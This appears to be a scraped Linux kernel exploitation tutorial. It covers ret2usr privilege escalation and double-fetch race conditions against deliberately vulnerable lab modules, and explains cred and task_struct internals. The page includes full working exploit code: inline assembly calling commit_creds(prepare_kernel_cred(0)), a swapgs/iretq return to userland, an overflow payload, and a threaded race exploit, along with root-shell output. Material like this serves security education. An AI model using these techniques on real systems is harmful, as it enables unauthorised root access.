By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.

The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.

hashtag
Vulnerable Module

circle-info

Note that the kernel version here is 6.1, due to some modifications we will discuss later.

The relevant code is here:

As we can see, it's a size 0x100 memcpy into a 0x20-byte buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by the compiler and the entire function just becomes xor eax, eax; ret!

hashtag
Exploitation

hashtag
Assembly to escalate privileges

Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.

circle-exclamation

For obvious reasons, you require root permissions to read this file!
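If you would rather look the addresses up from C than grep for them, the lookup can be sketched as below. find_symbol() is a hypothetical helper written for this page; it assumes the usual kallsyms line format of a hex address, a one-character type and a symbol name.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: scan kallsyms-formatted text ("<hex addr> <type> <name>")
 * and return the address of `name`, or 0 if it is not listed. */
static uint64_t find_symbol(FILE *f, const char *name) {
    assert(f != NULL && name != NULL);

    char line[512];
    while (fgets(line, sizeof(line), f)) {
        uint64_t addr;
        char type;
        char sym[256];

        /* Module symbols carry a trailing "[module]" field, which is ignored. */
        if (sscanf(line, "%" SCNx64 " %c %255s", &addr, &type, sym) != 3)
            continue;
        if (strcmp(sym, name) == 0)
            return addr;
    }
    return 0;
}
```

On the VM it would be used with a stream from fopen("/proc/kallsyms", "r"). Without root the addresses are typically reported as zeroes, so a return value of 0 can mean either "not found" or "not permitted".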

Now we know the locations of the two important functions. After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):

Then we call commit_creds() on the result (which is stored in RAX):

We can throw this directly into the C code using inline assembly:

hashtag
Overflow

The next step is overflowing. The 7th qword overwrites RIP:

Finally, we create a get_shell() function we call at the end, once we've escalated privileges:

hashtag
Returning to userland

If we run what we have so far, we fail and the kernel panics. Why is this?

The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which we'll cover soon).

What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalated privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!

We can store them as follows:

The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate() for after the privileges are acquired:

Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.

If we compile it statically and load it into the initramfs.cpio, notice that our privileges are elevated!

We have successfully exploited a ret2usr!

hashtag
Understanding the restoration

How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what all of the registers do. The switch to kernel mode is best explained by a literal StackOverflow post, or another one.

  • GS - limited segmentation. The contents of the GS register are swapped with one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs enables the process to obtain a pointer to kernel data structures.

    • Has to swap back to user space

  • SS - Stack Segment

GS is changed back via the swapgs instruction. All others are changed back via iretq, the QWORD variant of the iret family of Intel instructions. The intent behind iretq is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer’s Manual:

Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)

[...]

During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.
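The order matters because the stack grows downwards: the last value pushed is the first one iretq pops. In 64-bit mode iretq pops five qwords (RIP, CS, RFLAGS, RSP, SS), so pushing SS, RSP, RFLAGS, CS, RIP leaves them laid out in memory as in the sketch below. The struct and the fill_iret_frame() helper are hypothetical names used only to illustrate the layout.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The five qwords iretq pops in 64-bit mode, lowest address first. */
struct iret_frame {
    uint64_t rip;     /* popped first: where execution resumes */
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;      /* popped last, so it is pushed first */
};

/* Hypothetical helper: fill a frame from the values saved in userland. */
static void fill_iret_frame(struct iret_frame *frame, uint64_t rip, uint64_t cs,
                            uint64_t rflags, uint64_t rsp, uint64_t ss) {
    assert(frame != NULL);

    frame->rip = rip;
    frame->cs = cs;
    frame->rflags = rflags;
    frame->rsp = rsp;
    frame->ss = ss;
}
```

Reading the struct from the bottom up gives exactly the push sequence used in escalate().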

hashtag
Final Exploit

The final version

commit_creds           0xffffffff81077390
prepare_kernel_cred    0xffffffff81077510

Kernel

Heavily beta

rop_ret2usr_6.10.zip (4MB archive)
trying to get the previous section working
check the source here
version 6.1
version 6.10
here

Defines where the stack is stored

  • Must be reverted back to the userland stack

  • RSP

    • Same as above, really

  • CS - Code Segment

    • Defines the memory location that instructions are stored in

    • Must point to our user space code

  • RFLAGS - various things

  • rop_ret2usr.zip (4MB archive)
    KASLR
    we'll cover soon
    all of the registers
    a literal StackOverflow post
    another one
    GS - limited segmentation
    contents of the GS register are swapped one of the MSRs
    iretq
    Intel Software Developer’s Manual
    [    1.472064] BUG: kernel NULL pointer dereference, address: 0000000000000000
    [    1.472064] #PF: supervisor read access in kernel mode
    [    1.472064] #PF: error_code(0x0000) - not-present page
    [    1.472064] PGD 22d9067 P4D 22d9067 PUD 22da067 PMD 0 
    [    1.472064] Oops: Oops: 0000 [#1] SMP
    [    1.472064] CPU: 0 PID: 32 Comm: exploit Tainted: G        W  O       6.10.0-rc5 #7
    [    1.472064] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
    [    1.472064] RIP: 0010:commit_creds+0x29/0x180
    [    1.472064] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
    [    1.472064] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
    [    1.472064] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
    [    1.472064] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
    [    1.472064] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
    [    1.472064] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
    [    1.472064] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
    [    1.472064] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
    [    1.472064] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [    1.472064] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
    [    1.472064] Call Trace:
    [    1.472064]  <TASK>
    [    1.472064]  ? show_regs+0x64/0x70
    [    1.472064]  ? __die+0x24/0x70
    [    1.472064]  ? page_fault_oops+0x14b/0x420
    [    1.472064]  ? search_extable+0x2b/0x30
    [    1.472064]  ? commit_creds+0x29/0x180
    [    1.472064]  ? search_exception_tables+0x4f/0x60
    [    1.472064]  ? fixup_exception+0x26/0x2d0
    [    1.472064]  ? kernelmode_fixup_or_oops.constprop.0+0x58/0x70
    [    1.472064]  ? __bad_area_nosemaphore+0x15d/0x220
    [    1.472064]  ? find_vma+0x30/0x40
    [    1.472064]  ? bad_area_nosemaphore+0x11/0x20
    [    1.472064]  ? exc_page_fault+0x284/0x5c0
    [    1.472064]  ? asm_exc_page_fault+0x2b/0x30
    [    1.472064]  ? abort_creds+0x30/0x30
    [    1.472064]  ? commit_creds+0x29/0x180
    [    1.472064]  ? x64_sys_call+0x146c/0x1b10
    [    1.472064]  ? do_syscall_64+0x50/0x110
    [    1.472064]  ? entry_SYSCALL_64_after_hwframe+0x4b/0x53
    [    1.472064]  </TASK>
    [    1.472064] Modules linked in: kernel_rop(O)
    [    1.472064] CR2: 0000000000000000
    [    1.480065] ---[ end trace 0000000000000000 ]---
    [    1.480065] RIP: 0010:commit_creds+0x29/0x180
    [    1.480065] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
    [    1.484065] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
    [    1.484065] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
    [    1.484065] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
    [    1.484065] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
    [    1.484065] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
    [    1.484065] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
    [    1.484065] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
    [    1.484065] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [    1.484065] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
    [    1.488065] Kernel panic - not syncing: Fatal exception
    [    1.488065] Kernel Offset: disabled
    [    1.488065] ---[ end Kernel panic - not syncing: Fatal exception ]---
    [    1.480065] RIP: 0010:commit_creds+0x29/0x180
    $ gdb kernel_rop.ko
    pwndbg> target remote :1234
    pwndbg> b *0xffffffff81077390
    pwndbg> info reg rdi
    rdi            0x0                 0
    pwndbg> info reg rax
    rax            0x0                 0
    struct cred *prepare_kernel_cred(struct task_struct *daemon)
    {
    	const struct cred *old;
    	struct cred *new;
    
    	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    	if (!new)
    		return NULL;
    
    	kdebug("prepare_kernel_cred() alloc %p", new);
    
    	if (daemon)
    		old = get_task_cred(daemon);
    	else
    		old = get_cred(&init_cred);
    
    	validate_creds(old);
    
    	*new = *old;
    	new->non_rcu = 0;
    	atomic_long_set(&new->usage, 1);
    	set_cred_subscribers(new, 0);
    	get_uid(new->user);
    	get_user_ns(new->user_ns);
    	get_group_info(new->group_info);
    
    	// [...]
    	
    	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
    		goto error;
    
    	put_cred(old);
    	validate_creds(new);
    	return new;
    
    error:
    	put_cred(new);
    	put_cred(old);
    	return NULL;
    }
    struct cred *prepare_kernel_cred(struct task_struct *daemon)
    {
    	const struct cred *old;
    	struct cred *new;
    
    	if (WARN_ON_ONCE(!daemon))
    		return NULL;
    
    	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    	if (!new)
    		return NULL;
    
    	kdebug("prepare_kernel_cred() alloc %p", new);
    
    	old = get_task_cred(daemon);
    
    	*new = *old;
    	new->non_rcu = 0;
    	atomic_long_set(&new->usage, 1);
    	get_uid(new->user);
    	get_user_ns(new->user_ns);
    	get_group_info(new->group_info);
    
    	// [...]
    
    	new->ucounts = get_ucounts(new->ucounts);
    	if (!new->ucounts)
    		goto error;
    
    	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
    		goto error;
    
    	put_cred(old);
    	return new;
    
    error:
    	put_cred(new);
    	put_cred(old);
    	return NULL;
    }
    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred);
    if (WARN_ON_ONCE(!daemon))
        return NULL;
    static ssize_t rop_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
        char buffer[0x20];
    
        printk(KERN_INFO "Testing...");
        memcpy(buffer, buf, 0x100);
    
        printk(KERN_INFO "Yes? %s", buffer);
    
        return 0;
    }
    ~ # cat /proc/kallsyms | grep cred
    [...]
    ffffffff81066e00 T commit_creds
    ffffffff81066fa0 T prepare_kernel_cred
    [...]
    xor    rdi, rdi
    mov    rcx, 0xffffffff81066fa0
    call   rcx
    mov    rdi, rax
    mov    rcx, 0xffffffff81066e00
    call   rcx
    void escalate() {
        __asm__(
            ".intel_syntax noprefix;"
            "xor rdi, rdi;"
            "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
            "call rcx;"
    
            "mov rdi, rax;"
            "movabs rcx, 0xffffffff81066e00;"   // commit_creds
            "call rcx;"
            ".att_syntax;"                      // switch back so the rest of the file assembles
        );
    }
    // overflow
    uint64_t payload[7];
    
    payload[6] = (uint64_t) escalate;
    
    write(fd, payload, 0);
    void get_shell() {
        system("/bin/sh");
    }
    
    int main() {
        // [ everything else ]
        
        get_shell();
    }
    uint64_t user_cs;
    uint64_t user_ss;
    uint64_t user_rsp;
    uint64_t user_rflags;
    
    void save_state() {
        puts("[*] Saving state");
    
        __asm__(
            ".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_rsp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;"
        );
    
        puts("[+] Saved state");
    }
    uint64_t user_rip = (uint64_t) get_shell;
    
    void escalate() {
        __asm__(
            ".intel_syntax noprefix;"
            "xor rdi, rdi;"
            "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
            "call rcx;"
            
            "mov rdi, rax;"
            "movabs rcx, 0xffffffff81066e00;"   // commit_creds
            "call rcx;"
    
            // restore all the registers
            "swapgs;"
            "mov r15, user_ss;"
            "push r15;"
            "mov r15, user_rsp;"
            "push r15;"
            "mov r15, user_rflags;"
            "push r15;"
            "mov r15, user_cs;"
            "push r15;"
            "mov r15, user_rip;"
            "push r15;"
            "iretq;"
            ".att_syntax;"
        );
    }
    $ gcc -static -o exploit exploit.c
    [...]
    $ ./run.sh
    ~ $ ./exploit 
    [*] Saving state
    [+] Saved state
    FD: 3
    [*] Returned to userland
    ~ # id
    uid=0(root) gid=0(root)
    // gcc -static -o exploit exploit.c
    
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/mman.h>
    #include <stdint.h>
    
    void get_shell(void){
        puts("[*] Returned to userland");
        system("/bin/sh");
    }
    
    uint64_t user_cs;
    uint64_t user_ss;
    uint64_t user_rsp;
    uint64_t user_rflags;
    
    uint64_t user_rip = (uint64_t) get_shell;
    
    void save_state(){
        puts("[*] Saving state");
    
        __asm__(
            ".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_rsp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;"
        );
    
        puts("[+] Saved state");
    }
    
    void escalate() {
        __asm__(
            ".intel_syntax noprefix;"
            "xor rdi, rdi;"
            "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
            "call rcx;"
            
            "mov rdi, rax;"
            "movabs rcx, 0xffffffff81066e00;"   // commit_creds
            "call rcx;"
    
            "swapgs;"
            "mov r15, user_ss;"
            "push r15;"
            "mov r15, user_rsp;"
            "push r15;"
            "mov r15, user_rflags;"
            "push r15;"
            "mov r15, user_cs;"
            "push r15;"
            "mov r15, user_rip;"
            "push r15;"
            "iretq;"
            ".att_syntax;"
        );
    }
    
    int main() {
        save_state();
    
        // communicate with the module
        int fd = open("/dev/kernel_rop", O_RDWR);
        printf("FD: %d\n", fd);
    
        // overflow
        uint64_t payload[7];
    
        payload[6] = (uint64_t) escalate;
    
        write(fd, payload, 0);
    }

    Double-Fetch

    The most simple of vulnerabilities

    A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.

    hashtag
    A Vulnerable Kernel Module

    Let's start with a contrived example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.

    The code below will be the contents of the write() function of a kernel module. I've removed the boilerplate code mentioned previously, but here are the relevant parts:

    The program will:

    • Check if the ID we are attempting to switch to is 0

      • If it is, it doesn't allow us, as we attempted to log in as root

    • Sleep for 1 second (this is just to illustrate the example better, we will remove it later)

    hashtag
    Simple Communication

    Let's say we want to communicate with the module, and we set up a simple C program to do so:

    We compile this statically (as there are no shared libraries on our VM):

    As expected, the id variable gets set to 900 - we can check this in dmesg:

    That all works fine.

    hashtag
    Exploiting a Double-Fetch and Switching to ID 0

    The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:

    This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.

    Because this struct is controlled by the user, they have the power to change it whenever they like.

    The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):

    And once more, to set the id variable:

    Again, this might seem fine - but it's not. What is stopping it from changing in between these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
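The problem can be modelled entirely in userland. In the sketch below, a callback stands in for the racing thread and runs in the window between the check and the use; login_double_fetch(), login_single_fetch(), race_hook and flip_to_root() are hypothetical names invented for this illustration, not part of the module.

```c
#include <assert.h>
#include <stddef.h>

typedef struct {
    int id;
    char password[10];
} Credentials;

/* Called between the check and the use, standing in for the racing thread. */
typedef void (*race_hook)(Credentials *shared);

/* Vulnerable pattern: shared->id is read once for the check, again for the use. */
static int login_double_fetch(Credentials *shared, race_hook hook) {
    assert(shared != NULL);

    if (shared->id == 0)       /* first fetch: the security check */
        return -1;
    if (hook)
        hook(shared);          /* the window the attacker races into */
    return shared->id;         /* second fetch: the value actually used */
}

/* Safer pattern: snapshot the data once, then only use the private copy. */
static int login_single_fetch(Credentials *shared, race_hook hook) {
    assert(shared != NULL);

    Credentials local = *shared;   /* the only read of attacker-controlled memory */
    if (local.id == 0)
        return -1;
    if (hook)
        hook(shared);              /* changing the original no longer matters */
    return local.id;
}

/* What the attacker does inside the window. */
static void flip_to_root(Credentials *shared) {
    shared->id = 0;
}
```

With flip_to_root as the hook, the double-fetch version ends up using 0 even though the check saw 900, while the single-fetch version keeps the value it checked. In a real module the snapshot would normally be taken with copy_from_user() rather than a plain struct copy.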

    hashtag
    A Proof-of-Concept: Switching to ID 0

    In between the two dereferences of creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race condition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.

    Here's the plan, visually, if it helps:

    In the waiting period, we swap out the id.

    circle-info

    If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we move on to part 2, with no sleep, we require multiple cores.

    The C program will hang on write until the kernel module returns, so we can't use the main thread.

    With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!

    We have to compile it statically, as the VM has no shared libraries.

    Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):

    Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:

    Use the newly-created initramfs.cpio to launch the VM with run.sh. Executing exploit, it is successful!

    circle-info

    Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.

    The Ultimate Aim of Kernel Exploitation - Process Credentials

    hashtag
    Overview

    Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped as root.

    To understand this, we have to talk a little about how privileges and credentials work in Linux.

    KASLR

    KASLR is the kernel version of ASLR, randomizing various parts of kernel space to make exploitation more complicated (in the exact same way regular ASLR does so for userspace exploitation).

    TODO

    Random stuff I want to mention somewhere, but too small for its own page

    Discuss sched_yield and CPU affinity.

    Kernel code gets patched at runtime (ch4)

    Heap Structures

    Compare the password to p4ssw0rd

    • If it is, it will set the id variable to the id in the creds structure

    the boilerplate code mentioned previously
    double_fetch_sleep.zip (0B archive)
    hashtag
    The cred struct

    The cred struct contains all the permissions a task holds. The ones that we care about are typically these:

    These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.

    circle-info

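    Note the __randomize_layout here at the end! This is a compiler annotation that tells it to shuffle the order of the struct's fields at build time (when the kernel is compiled with structure layout randomization enabled), making it harder to target the structure!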

    hashtag
    task_struct

    The kernel needs to store information about each running task, and to do this it uses the task_struct structure. Each kernel task has its own instance.

    The task_struct instances are stored in a linked list, with a global kernel variable init_task pointing to the first one. Each task_struct then points to the next.

    Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained here:

    In effect, real_cred is the initial credential of the process, and is used by processes acting on the process. cred is the current credential, used to define what the process is allowed to do. We have to keep track of both as some processes care about the initial cred and some about the updated.

    An example of caring about the real_cred instead of cred is in the implementation of /proc/$PID/status, which displays the real_cred as the owner of a process, even if privileges are elevated (note that __task_cred is a macro to grab real_cred, confusingly). Conversely, setuid executables will modify cred and not real_cred.

    So, which set of credentials do we want to target with an arbitrary write? It will depend on what set is relevant for the purpose, but since you usually want to be creating new processes (through system or execve), the cred is used. In some cases, real_cred will work too, because it seems as if the pointers initially point to the same struct (though note that this excerpt is not from process creation but copy_process, which is called by the fork syscall, so it could differ for new process creation).

    hashtag
    prepare_kernel_cred() and commit_creds()

    As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.

    hashtag
    prepare_kernel_cred()

    The function can be found here, but there's not much to say - it creates a new cred struct called new then destroys the old. It returns new.

    If NULL is passed as the argument, it will return a new set of credentials that match the init_task credentials, which default to root credentials. This is very important, as it means that calling prepare_kernel_cred(0) results in a new set of root creds!

    circle-exclamation

    This last part is different on newer kernel versions - check out the Debugging a Kernel Module section!

    hashtag
    commit_creds()

    This function is found here, but ultimately it will update task->real_cred and task->cred to the new credentials:

    hashtag
    Resources and References

    • Xarkes' Baby Kernel 2 writeup

    • TeamItaly's FamilyRecipes writeup

    #define PASSWORD    "p4ssw0rd"
    
    typedef struct {
        int id;
        char password[10];
    } Credentials;
    
    static int id = 1001;
    
    static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
        Credentials *creds = (Credentials *)buf;
    
        printk(KERN_INFO "[Double-Fetch] Reading password from user...");
    
        if (creds->id == 0) {
            printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
            return -1;
        }
    
        // to increase reliability
        msleep(1000);
    
        if (!strcmp(creds->password, PASSWORD)) {
            id = creds->id;
            printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
            return id;
        }
    
        printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
        return -1;
    }
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    typedef struct {
        int id;
        char password[10];
    } Credentials;
    
    int main() {
        int fd = open("/dev/double_fetch", O_RDWR);
        printf("FD: %d\n", fd);
    
        Credentials creds;
        creds.id = 900;
        strcpy(creds.password, "p4ssw0rd");
    
        int res_id = write(fd, &creds, 0);    // last parameter here makes no difference
        printf("New ID: %d\n", res_id);
    
        return 0;
    }
    gcc -static -o exploit exploit.c
    $ dmesg
    [...]
    [    3.104165] [Double-Fetch] Password correct! ID set to 900
    Credentials *creds = (Credentials *)buf;
    if (creds->id == 0) {
        printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
        return -1;
    }
    if (!strcmp(creds->password, PASSWORD)) {
        id = creds->id;
        printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
        return id;
    }
    // gcc -static -o exploit -pthread exploit.c
    
    #include <fcntl.h>
    #include <pthread.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    void *switcher(void *arg);
    
    typedef struct {
        int id;
        char password[10];
    } Credentials;
    
    int main() {
        // communicate with the module
        int fd = open("/dev/double_fetch", O_RDWR);
        printf("FD: %d\n", fd);
    
        // use a random ID and set the password correctly
        Credentials creds;
        creds.id = 900;
        strcpy(creds.password, "p4ssw0rd");
    
        // set up the switcher thread
        // pass it a pointer to `creds`, so it can modify it
        pthread_t thread;
    
        if (pthread_create(&thread, NULL, switcher, &creds)) {
            fprintf(stderr, "Error creating thread\n");
            return -1;
        }
    
        // now we write the cred struct to the module
        // it should be swapped after about .3 seconds by switcher
        int res_id = write(fd, &creds, 0);
    
        // write returns the id we switched to
        // if all goes well, that is 0
        printf("New ID: %d\n", res_id);
    
        // finish thread cleanly
        if (pthread_join(thread, NULL)) {
            fprintf(stderr, "Error joining thread\n");
            return -1;
        }
    
        return 0;
    }
    
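    void *switcher(void *arg) {
        Credentials *creds = (Credentials *)arg;
    
        // wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
        // sleep() takes whole seconds, so sleep(0.3) truncates to 0; use usleep() for 0.3s
        usleep(300000);
    
        creds->id = 0;
        return NULL;
    }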
    $ gcc -static -o exploit -pthread exploit.c
    $ cpio -i -F initramfs.cpio
    $ find . -not -name '*.cpio' | cpio -o -H newc > initramfs.cpio
    ~ # ./exploit 
    FD: 3
    New ID: 0
    struct cred {
    	/* ... */
    	
    	kuid_t		uid;		/* real UID of the task */
    	kgid_t		gid;		/* real GID of the task */
    	kuid_t		suid;		/* saved UID of the task */
    	kgid_t		sgid;		/* saved GID of the task */
    	kuid_t		euid;		/* effective UID of the task */
    	kgid_t		egid;		/* effective GID of the task */
    	kuid_t		fsuid;		/* UID for VFS ops */
    	kgid_t		fsgid;		/* GID for VFS ops */
    	
    	/* ... */
    } __randomize_layout;
    struct task_struct {
        	/* ... */
        
    	/*
    	 * Pointers to the (original) parent process, youngest child, younger sibling,
    	 * older sibling, respectively.  (p->father can be replaced with
    	 * p->real_parent->pid)
    	 */
    
    	/* Real parent process: */
    	struct task_struct __rcu	*real_parent;
    
    	/* Recipient of SIGCHLD, wait4() reports: */
    	struct task_struct __rcu	*parent;
    
    	/*
    	 * Children/sibling form the list of natural children:
    	 */
    	struct list_head		children;
    	struct list_head		sibling;
    	struct task_struct		*group_leader;
    
    	/* ... */    
    
    	/* Objective and real subjective task credentials (COW): */
    	const struct cred __rcu		*real_cred;
    
    	/* Effective (overridable) subjective task credentials (COW): */
    	const struct cred __rcu		*cred;
    
        	/* ... */
    };
    /*
     * The security context of a task
     *
     * The parts of the context break down into two categories:
     *
     *  (1) The objective context of a task.  These parts are used when some other
     *	task is attempting to affect this one.
     *
     *  (2) The subjective context.  These details are used when the task is acting
     *	upon another object, be that a file, a task, a key or whatever.
     *
     * Note that some members of this structure belong to both categories - the
     * LSM security pointer for instance.
     *
     * A task has two security pointers.  task->real_cred points to the objective
     * context that defines that task's actual details.  The objective part of this
     * context is used whenever that task is acted upon.
     *
     * task->cred points to the subjective context that defines the details of how
     * that task is going to act upon another object.  This may be overridden
     * temporarily to point to another security context, but normally points to the
     * same context as task->real_cred.
     */
    rcu_assign_pointer(task->real_cred, new);
    rcu_assign_pointer(task->cred, new);

    Double-Fetch without Sleep

    Removing the artificial sleep

    hashtag
    Overview

    In reality, there won't be a 1-second sleep for your race condition to occur in. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!

    This will not work every time - in fact, it's quite likely to fail! - so we will instead have two loops: one that keeps writing 0 to the ID, and another that sets the ID to another value (e.g. 900) and then calls write. The aim is for the thread that switches to 0 to sync up so perfectly that the switch occurs in between the ID check and the ID "assignment".
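To make the two fetches concrete, here is a minimal userspace sketch of the pattern being raced. It is not the module's code: fake_login, the Credentials layout and the password buffer size are assumptions made for illustration, and the volatile pointer only stands in for memory that another thread may change between reads.

```c
#include <string.h>

#define PASSWORD "p4ssw0rd"

/* Hypothetical layout; the real struct is whatever the module defines. */
typedef struct {
    int id;
    char password[16];
} Credentials;

/* Userspace stand-in for the vulnerable handler: the ID is read twice. */
int fake_login(volatile Credentials *creds) {
    /* first fetch: the check */
    if (creds->id == 0)
        return -1;

    /* race window: another thread may set creds->id to 0 right here */
    if (strcmp((const char *)creds->password, PASSWORD) != 0)
        return -1;

    /* second fetch: the use, which may no longer match what was checked */
    return creds->id;
}
```

Without a second thread the function behaves as intended: an ID of 0 is rejected. The exploit only works because the value can change between the first and second read.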

    hashtag
    Analysis

    If we check the source, we can see that there is no msleep any longer:

    hashtag
    Exploitation

    Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:

    Then we are going to write this struct to the module repeatedly. We will loop 1,000,000 times (effectively infinite for our purposes) rather than forever, to make sure the program terminates even if we never win the race:

    If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.

